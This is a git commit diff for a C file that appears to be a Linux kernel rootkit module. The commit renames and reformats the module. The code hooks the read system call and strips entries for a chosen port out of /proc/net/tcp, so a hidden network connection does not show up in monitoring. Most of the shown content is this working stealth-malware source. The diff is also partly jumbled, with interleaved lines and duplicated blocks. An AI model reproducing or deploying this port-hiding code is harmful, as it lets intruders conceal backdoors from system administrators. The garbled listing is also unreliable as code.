Dude, das war richtig schlecht geschriebener Code

2019-12-08 12:04:42 +01:00 · 2019-12-08 12:04:42 +01:00 · c897df31ec
commit c897df31ec
parent ed5b2fa92a
1 changed files with 43 additions and 26 deletions
--- a/src/h1d3p0r7.c
+++ b/src/h1d3p0r7.c
@ -23,6 +23,11 @@
 *******************************************************************************/
 #include "h1d3p0r7.h"
 /**** var **********************************************************************
 *******************************************************************************/
 sys_read_ptr sys_read_orig;
 /*******************************************************************************/
 /***  FUNCTION  ****************************************************************
@ -32,7 +37,7 @@
 *       RETURNS:
 *******************************************************************************/
-asmlinkage long hacked_read(unsigned int fd, char __user *buf,
+asmlinkage long sys_read_fake(unsigned int fd, char __user *buf,
                              size_t count)
 {
 	long result, bp, diff_in_bytes;
@ -43,47 +48,59 @@ asmlinkage long hacked_read(unsigned int fd, char __user *buf,
 	struct path file_path;
 	// run real read
-	result = (*orig_read)(fd,buf,count);
+	result = (*sys_read_orig)(fd, buf, count);
-	if (result <= 0)
+
-		return result;
+	if (result <= 0){
 		return result;
 	}
 	// get pathname
 	// CITATION [8] from report
 	current_files = current->files;
 	files_table = files_fdtable(current_files);
 	file_path = files_table->fd[fd]->f_path;
-	pathname = d_path(&file_path,pbuf,256*sizeof(char));
+	pathname = d_path(&file_path, pbuf, 256*sizeof(char));
 	// if virtual file /proc/net/tcp
 	if (!strncmp(pathname,"/proc/",6) && !strcmp(pathname+10,"/net/tcp")) {
 		// copy from user to kernelspace;
 		if (!access_ok(VERIFY_READ,buf,result))
 			return -1;
 		if ((kbuf = kmalloc(result,GFP_KERNEL)) == NULL)
 			return -1;
 		if (copy_from_user(kbuf,buf,result))
 			return -1;
-		// filter out hidden ports
+
-		start_line = strchr(kbuf,':') - 4; // skip first line
+	if (!strncmp(pathname, "/proc/", 6) && !strcmp(pathname + 10, "/net/tcp")) {
 		if (!access_ok(VERIFY_READ, buf, result)){
 			return -1;
 		}
 		if ((kbuf = kmalloc(result, GFP_KERNEL)) == NULL){
 			return -1;
 		}
 		if (copy_from_user(kbuf, buf, result)){
 			return -1;
 		}
 		start_line = strchr(kbuf, ':') - 4;
 		diff_in_bytes = (start_line - kbuf) * sizeof(char);
 		for (bp = diff_in_bytes; bp < result; bp += diff_in_bytes) {
 			start_line = kbuf + bp;
-			port_num = strchr(strchr(start_line,':') + 1,':') + 1;
+			port_num = strchr(strchr(start_line, ':') + 1, ':') + 1;
-			end_line = strchr(start_line,'\n');
+			end_line = strchr(start_line, '\n');
 			diff_in_bytes = ((end_line - start_line) + 1) * sizeof(char);
-			if (!strncmp(port_num,HIDE_PORT,4)) { // if magic port
+
-				memmove(start_line,end_line + 1, // delete line in file
+			if (!strncmp(port_num, DEFAULT_PORT_HEX, 4)) {
 				memmove(start_line, end_line + 1,
 						result - bp - diff_in_bytes);
 				result -= diff_in_bytes;
 			}
 		}
 		// copy from kernel to userspace
-		if (!access_ok(VERIFY_WRITE,buf,result))
+		if (!access_ok(VERIFY_WRITE, buf, result)){
 			return EINVAL;
-		if (copy_to_user(buf,kbuf,result))
+		}
 		if (copy_to_user(buf, kbuf, result)){
 			return EINVAL;
 		}
 		kfree(kbuf);
 	}
 	// return number of bytes read